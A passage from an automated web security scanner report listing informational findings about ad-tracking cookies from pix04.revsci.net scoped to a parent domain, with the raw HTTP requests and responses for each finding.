rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk/dmP4TX+ser9duzVms895ML; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:38 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e647e&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:38 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:37 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.165. http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/213412415.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt34zskdUB6wb/neBD5w==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/
NETID01=TUl0eAsBEwoAAAi6CCwAAABj; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:12:56 GMT; Path=/
udm_0=MLvv7iEOIS5n5S4sf9LIKtCBJlhlZ4wlO6B9VyvkGoyzMH7D2WQp3ftWI0PMoz9Hh9fKDp1/mUeaTVZAD2sUmSEumxTZ7qTHeaTajtWig78dOo0vtnm9lh8+PcN1S2PGKsPZZhZd3IPo8wA3CBgyCxs8roLRagKRmKL+IMR2fkwptAZa7ZnjONj5PBl6mDenKzm6tvDzGiI2xJiEk+JZoEy3cJ7GsQ44kugPJQK2nLpvRboqevnJkiBn6cJUdF9g9l3Et37CRe44hpuXi4fQkPD6PSZagwqV8pwbYPDiSFUj/WYyu4jDKt6kZPsKfD8M97H9xnvsE8qaHADuNwoV3tqyK7nasBcM7aGO5JMRBtADmLpzlYS49Sgt+u92fAIOU8AWl4KqYMZQI63CJllHgWon/3yB0KkEhW5Ny6TGpSnYrUPRdHHIuyXVTbI2gihM4dqmj4m4wN4Z7tLwGL08cATb+7MzVV0mVwn4K9KsfwH9fFRLpJ+FUxk4edQ0kYnub2d/j8VnHB5QhQQgzJCswhu/UdS2f1SiTrmriDroOArOp6Z03WAlBLU6; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/213412415.js?D=DM_LOC%3Dabout%253Ablank%253F_rsiL%253D0%26DM_EOM%3D1&C=F08747 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt34zskdUB6wb/neBD5w==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/
Set-Cookie: NETID01=TUl0eAsBEwoAAAi6CCwAAABj; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:12:56 GMT; Path=/
Set-Cookie: udm_0=MLvv7iEOIS5n5S4sf9LIKtCBJlhlZ4wlO6B9VyvkGoyzMH7D2WQp3ftWI0PMoz9Hh9fKDp1/mUeaTVZAD2sUmSEumxTZ7qTHeaTajtWig78dOo0vtnm9lh8+PcN1S2PGKsPZZhZd3IPo8wA3CBgyCxs8roLRagKRmKL+IMR2fkwptAZa7ZnjONj5PBl6mDenKzm6tvDzGiI2xJiEk+JZoEy3cJ7GsQ44kugPJQK2nLpvRboqevnJkiBn6cJUdF9g9l3Et37CRe44hpuXi4fQkPD6PSZagwqV8pwbYPDiSFUj/WYyu4jDKt6kZPsKfD8M97H9xnvsE8qaHADuNwoV3tqyK7nasBcM7aGO5JMRBtADmLpzlYS49Sgt+u92fAIOU8AWl4KqYMZQI63CJllHgWon/3yB0KkEhW5Ny6TGpSnYrUPRdHHIuyXVTbI2gihM4dqmj4m4wN4Z7tLwGL08cATb+7MzVV0mVwn4K9KsfwH9fFRLpJ+FUxk4edQ0kYnub2d/j8VnHB5QhQQgzJCswhu/UdS2f1SiTrmriDroOArOp6Z03WAlBLU6; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 645
Date: Wed, 02 Feb 2011 15:12:55 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3}$)/,'$1');
rsiDom=rsiDom.
...[SNIP]...

11.166. http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/268190583.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFeU+FbxIQ1kNYvHseIeEiFPLY3sGlBwefeQGolpUspQOMVXTsemteSudqC0pSV1UN7CZ9KyQiVwn/zK5v5+ZZn71cfM4GDM50Q9Bw8GkAZ6L34ZmFnGKHV8+IM1GCBrxtqctOdKW322q4O2xI0xQVbFabIj862tETQanfX0EDjeVZi1FPBzZhlrQGJeM0b1IOojZ1EOdiRWtl2ZtO0tV+rCjUnwLONrvANz8CskgoTzHdE5YQzFjxb1WMuZoF3a1UNiIklxHRD9X1m5TDxPwAUF/RZOkC8aI=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:18 GMT; Path=/
NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d6e5e16&0&&4d4637e7&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:11:18 GMT; Path=/
rtc_0=MLsvsNUvMS5jJgE8Afe6cA8GOkRpRUJqdhGXytGsaksERlXaQKx/4QWi7SgDZPpq3+/yS+PtxMQT7DslgE+EiBMcoaILk+Ef3L6S+X2ToNJcKBHEUablLssaqzXvV0sN4iDF0eGzgINZcw0zPNEtmOEE06Lc75H0M56FBbh7W8JtRCa2OY8hXfnQ78Ntfwd8Pi/uyyCsCDe/7oef4Q68KNQWoA0k6/Ey/XPEcRFH6e+vUJvXkn234H1VDFNHBrAHQpXd6yTuomwDMbZxJsmZZvYCyYw7/cukzr9wj4x+P80HSx7GlXYrxd2NakbjRStgM+cuf+Zkw+bydKqoYwLxNe7ilVeQkPgJird4IqH9PvP6Fn0NuvtiIdlSlMv2k3YFE3VJySPI6vaNXu6zlawyJfcFjM7qAPDKrPYCruxbpRp6mdbcs11vMXenHTWL+6zILeuekHavtPJQ; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/268190583.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.ehow.com%252F%253F_rsiL%253D0%26DM_EOM%3D1&C=F08747 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=; rsi_segs_1000000=pUPFeUOFbwIUllNab/cemd1+k3oMcz9wc4mVCGdkHCrwWmaePNeODkXbq2K+tQyP8LR5ylRhRNgirDTpoIcrk+cIkXXfbtlOSmsfU1UZkujEsLbnRvi1mdYlE9GqFbJhJJ6Bxw2/6Vp1FAEA8dbQxknNO77OBB0EhWDzhf+pHpllJGeHUdUpo++k4d+c5bY1Qvx4d5W47BVKBDhTd7AdL12fLl6zFZaTu+rTxdLhlftv2v2MUDe2Y91CvpzYDUg3O3napeeKccCImESkDVzox9S9Nh2WBZtMXhJbvQq6; udm_0=MLvv9SEJaSpn5l6pKNOgJzc7zXFBImlqLQZYGOfvoT8h7Ts3xm/ap8Mkb9Q+GVTuR5n80ave3qy14HbyO8+Tcni3oWJVsXNJZ2BoNcclQkVAkXBr3QjDZUGqY/VB76lycBkbXZ/PmM5ZvqG73GQvL4NN3zYvKIXx9zvKHgRcUGOKdYPdUASY9ojdIV8gYJGQFNpzGY2z0gWMDX4TxCEac8R3Ke9ppb194xfECkX2pU1O1iHFy42uElW4j5+v/f8eKkFQ5MzvYE/jyv/rdQiQ09Ai+GU/SjsOZnNQhSBqoMRy93up9vn3PUZA45DM7V+v2Zgn8PXHeSPS85ij7VFR9oQiUVQO38lZzBhUE4hFvl3EkuGg0bi17IV4EBRVWiGu2RmG1QDm5JKJTNslOkv1LdL89z3GMvpJmvs+T5vdyHmAWeZtfRM9cFdfQGSZJjmNUVtgqHDCEiPN0vrW3gnfNbz8nrxNp/cOhwEmsOuhPOMUp+bhkRfmz9kYr5Jnari/GTw58CYqV8h4rzD7qgsc6K4ko5+gPLeQCL5fF69RvQ7fHNZCY0Wgm6mdclFvksFmiNCBpS9srXF7bYyO3+oeVB4D8j5B9nxiUjybPaivGWNDOgiQD79UoUb73FJ7Wm2q4yQrEhX1SpimuhPzRYA0qz7LRvSc3Zoyp+uKsqctxrNIF98i4/5zjBOYg6j/oTeItuQpdMgnyCRARTjQVRzDG96I9Zo6QAEqZ+Y0Iv7BJZL6jkVTjliHFn3FYRW3KH63Oo2bPpUYPX3DgLj6a3b3noH5DkkVQsOSyax16pb5DFwSyDDHu/ugupu5TH8NhEFXauRtWMQprWMn/RWgZFUzttuV9+nL1UnJeHsmWcaceq2g5cjxG1QCGzBbIio/mVhYuhpLzriZs7gmMWx57OH6EAkOz81CWKdorEUgfK0LHu/h+pCNMEHMQhgIlyLysXM8hjqWOr2q1JiFiQmE8C5vXaiir/3o/JYyvxUU0zqT2uM0qnKPCWoCbsd3re35olXtVu8xecblsDX5g66gqZsTE6PDW8nGDZGkIdAGFJ7PZeycd5UmrQSEfWKf4cgvbrqXv0XExi2hrQTYXR0Ql4YjukjJ8J5wlmXH0J4hY3uL+VfDSeK4BvrrNJu19JkjkefmVpbC4yYpcu0I0IY4u43Hkcwa1LL+N8+mYbQTmfoGF5IQ+frCKYD5ncwZ04oRqB8G8Y3clOManGAsTIJJC1Hgb3tiZMPDnWHX1HKz

Response

11.167. http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/268190583.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LC1yGSiOI1VkRpa9w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:34 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e647a&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/268190583.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LC1yGSiOI1VkRpa9w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:34 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e647a&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:34 GMT; Path=/
X-Proc-ms: 9
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:33 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.168. http://pix04.revsci.net/F08747/b3/0/3/1003161/310338891.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/310338891.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9mCyCCM1VkT2a+s=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:20 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b0&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:20 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/310338891.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
